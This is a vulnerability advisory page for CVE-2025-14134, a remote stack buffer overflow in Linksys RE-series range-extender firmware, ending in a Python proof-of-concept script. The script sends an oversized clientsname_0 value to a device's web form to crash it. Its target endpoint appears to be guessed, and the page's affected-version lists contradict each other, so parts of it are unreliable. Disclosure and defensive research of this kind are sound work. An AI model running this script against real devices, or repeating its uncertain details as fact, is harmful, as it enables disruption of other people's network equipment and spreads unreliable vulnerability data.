Security Vulnerability Report
CVE-2025-14134 CVSS 8.8 HIGH

Published: 2025-12-06 11:15:48
Last Modified: 2025-12-10 18:00:28

Description

A vulnerability was found in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. The affected function is RE2000v2Repeater_get_wireless_clientlist_setClientsName in the file mod_form.so. Manipulating the argument clientsname_0 can lead to a stack-based buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linksys:re6500_firmware:1.0.013.001:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re6500:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linksys:re6250_firmware:1.0.04.001:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re6250:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linksys:re6300_firmware:1.2.07.001:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re6300:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linksys:re6350_firmware:1.0.04.001:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re6350:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linksys:re7000_firmware:1.1.05.003:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:re7000:-:*:*:*:*:*:*:* - NOT VULNERABLE
Linksys RE6500 firmware 1.0.013.001
Linksys RE6250 firmware 1.0.04.001
Linksys RE6300 firmware 1.0.04.002
Linksys RE6350 firmware 1.1.05.003
Linksys RE7000 firmware 1.2.07.001
Linksys RE9000 firmware 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-14134 PoC - Linksys RE series buffer overflow
Note: This PoC is for educational and security research purposes only.
"""
import requests
import sys
import argparse


def exploit_buffer_overflow(target_ip, target_port=80):
    """
    Exploit stack-based buffer overflow in
    RE2000v2Repeater_get_wireless_clientlist_setClientsName
    """
    # Construct malicious payload with oversized clientsname_0 parameter
    # This creates a buffer overflow condition
    payload = "A" * 1000  # Large payload to overflow stack buffer

    # Target endpoint (typically the form handler)
    url = f"http://{target_ip}:{target_port}/wlfrt-encrypt.cgi"

    # Construct POST data with vulnerable parameter
    data = {
        "clientsname_0": payload,
        "submit_button": "Wireless_Repeater",
        "change_action": "",
        "action": "Apply"
    }

    try:
        print(f"[*] Sending exploit payload to {target_ip}...")
        response = requests.post(url, data=data, timeout=10)
        print(f"[+] Response status: {response.status_code}")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-14134 PoC")
    parser.add_argument("target", help="Target IP address")
    parser.add_argument("-p", "--port", type=int, default=80, help="Target port")
    args = parser.parse_args()
    exploit_buffer_overflow(args.target, args.port)
